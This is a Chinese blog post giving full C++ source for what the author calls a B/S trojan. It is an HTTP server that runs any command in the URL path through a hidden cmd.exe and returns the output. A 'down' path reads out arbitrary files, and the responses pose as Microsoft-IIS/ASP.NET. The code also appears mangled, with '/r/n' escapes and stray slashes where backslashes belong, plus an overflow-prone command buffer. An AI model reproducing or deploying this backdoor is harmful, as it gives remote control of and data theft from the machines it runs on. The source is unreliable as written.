用vc编写http服务器

      最近一直在弄网络编程，所以写了个http服务器，也可以说是个b/s木马吧，呵呵，因为实现了一些木马的功能。

#include<iostream> #include<afx.h> #include<string> #include "mysocket.cpp" using namespace std; int port=8000; string URLDecode(string &strSrc) { string buffer = ""; int len = strSrc.length(); for (int i = 0; i < len; i++) { int j = i ; char ch = strSrc.at(j); if (ch == '%') { char tmpstr[] = "0x0__"; int chnum; tmpstr[3] = strSrc.at(j+1); tmpstr[4] = strSrc.at(j+2); chnum = strtol(tmpstr, NULL, 16); buffer += chnum; i += 2; } else if(ch == '+') { buffer += ' '; } else { buffer += ch; } } len=MultiByteToWideChar(CP_UTF8, 0, buffer.c_str (), -1, NULL,0); WCHAR * wszUtf8 = new WCHAR[len+1]; if( wszUtf8 == NULL ) { strSrc = ""; return strSrc; } memset(wszUtf8, 0, len * 2 + 2); MultiByteToWideChar(CP_UTF8, 0, buffer.c_str (), -1, wszUtf8, len); len = WideCharToMultiByte(CP_ACP, 0, wszUtf8, -1, NULL, 0, NULL, NULL); char *szUtf8=new char[len + 1]; if( szUtf8 == NULL ) { delete[] wszUtf8; strSrc = ""; return strSrc; } memset(szUtf8, 0, len + 1); WideCharToMultiByte (CP_ACP, 0, wszUtf8, -1, LPSTR(szUtf8), len, NULL,NULL); strSrc = szUtf8; delete[] szUtf8; delete[] wszUtf8; return strSrc; } DWORD WINAPI server(LPVOID l){ mysocket *s=(mysocket*)l; //while(1){ char aa[4096]={0}; s->recv(aa,4096); if(strlen(aa)==0){ //continue; s->close(); delete s; return 0; } CString as=aa; as.Replace("%20"," "); as.Replace("%5C","//"); char *str=strstr((LPCSTR)as,"/")+1; int i=0; char path[200]={0}; while(1){ if(*str==' ' && *(str+1)=='H'){ break; } path[i]=*(str++); i++; } cout<<path<<endl; if(strstr(path,"down ")-path==0){ string p=URLDecode(string(path)); const char* s1=p.data(); cout<<s1+5; CFile f; if(!f.Open((s1+5),CFile::modeRead)){ char a[500]={0}; sprintf(a,"HTTP/1.1 200 Ok/r/n"/ "Server: Microsoft-IIS/5.1/r/n"/ "content-length:5/r/n"/ "cache-control:private/r/n"/ "Content-Type: text/html/r/n/r/nerror" ); s->send(a,500); // continue; s->close(); delete s; return 0; } int len=f.GetLength(); BYTE *a=new BYTE[400]; memset(a,0,400); sprintf((char*)a,"HTTP/1.1 200 OK/r/n" "Server: Microsoft-IIS/5.1/r/n" "X-Powered-By: ASP.NET/r/n" "Date: Tue, 13 Apr 2010 09:31:06 GMT/r/n" "Content-Type: application/octet-stream/r/n" "Accept-Ranges: bytes/r/n" "Last-Modified: Sat, 18 Apr 2009 16:31:52 GMT/r/n" "Content-Length: %d/r/n/r/n",len); BYTE *b=new BYTE[4096]; memset(b,0,4096); s->send((char*)a,strlen((char*)a)); while(f.Read((void*)b,4096)){ s->send((char*)b,4096); memset(b,0,4096); } //continue; s->close(); delete s; delete []b; delete []a; return 0; } char cmd[50]; GetSystemDirectory(cmd,sizeof(cmd)); strcat(cmd,"//cmd.exe /c "); strcat(cmd,path); SECURITY_ATTRIBUTES sa; sa.nLength=sizeof(SECURITY_ATTRIBUTES); sa.bInheritHandle=true; sa.lpSecurityDescriptor=0; HANDLE p,p1; CreatePipe(&p,&p1,&sa,0); STARTUPINFO start; start.cb=sizeof(STARTUPINFO); GetStartupInfo(&start); start.hStdError=p1; start.hStdOutput=p1; start.wShowWindow=SW_HIDE; start.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; PROCESS_INFORMATION pi; CreateProcess(0,cmd,0,0,true,0,0,0,&start,&pi); //WaitForSingleObject(pi.hProcess,-1); CloseHandle(p1); char out[4096]={0},out1[1024]={0}; while(1){ DWORD n; ReadFile(p,out1,1024,&n,0); if(n>0){ strcat(out,out1); memset((void*)out1,0,1024); }else{ break; } } CloseHandle(p); as=out; as.Replace("/n","<br>"); char a[4096]={0}; sprintf(a,"HTTP/1.1 200 Ok/r/n"/ "Server: Microsoft-IIS/5.1/r/n"/ "content-length:%d/r/n"/ "cache-control:private/r/n"/ "Content-Type: text/html/r/n/r/n%s",as.GetLength(),(LPCSTR)as ); //cout<<a; s->send(a,4096); //s->close(); //} s->close(); delete s; return 0; } main(){ WSADATA data; WORD v=MAKEWORD(2,2); WSAStartup(v,&data); mysocket s; s.init(); s.bind(port); s.listen(); while(1){ mysocket *s1=new mysocket; s.accept(*s1); CreateThread(0,0,server,(void*)s1,0,0); } }

     默认端口为8000，你可以直接在路径后跟命令，比如http://127.0.0.1:8000/dir

便会回显dir执行的命令信息，http://127.0.0.1:8000/down 1.rar

便会下载1.rar文件，如果是ie，则要把空格写成%20，ff则会自动转换。

      我是用多线程来监听客户端连接的，所以可以同时响应多个用户的连接。

在试验中发现ff会在你请求后一直保持连接，而ie则会在你请求得到结果后自动断开，在你下一次请求时重连。所以我在线程函数里便执行了一次接受发送操作，然后断开，该线程返回结束。

      关于结果的读取，我采用了单向管道，cmd进程的输出直接绑定到写管道上，然后程序便可以读取了，在下载文件操作上，我是用byte数组的，将http响应头和文件内容直接写入byte数组中，然后发送即可（不能用char数组，char数组以0作为结尾，这在二进制文件传输中是致命的，二进制文件可不是以0结尾的啊）。

       本文有不足之处，还望大家多多指正。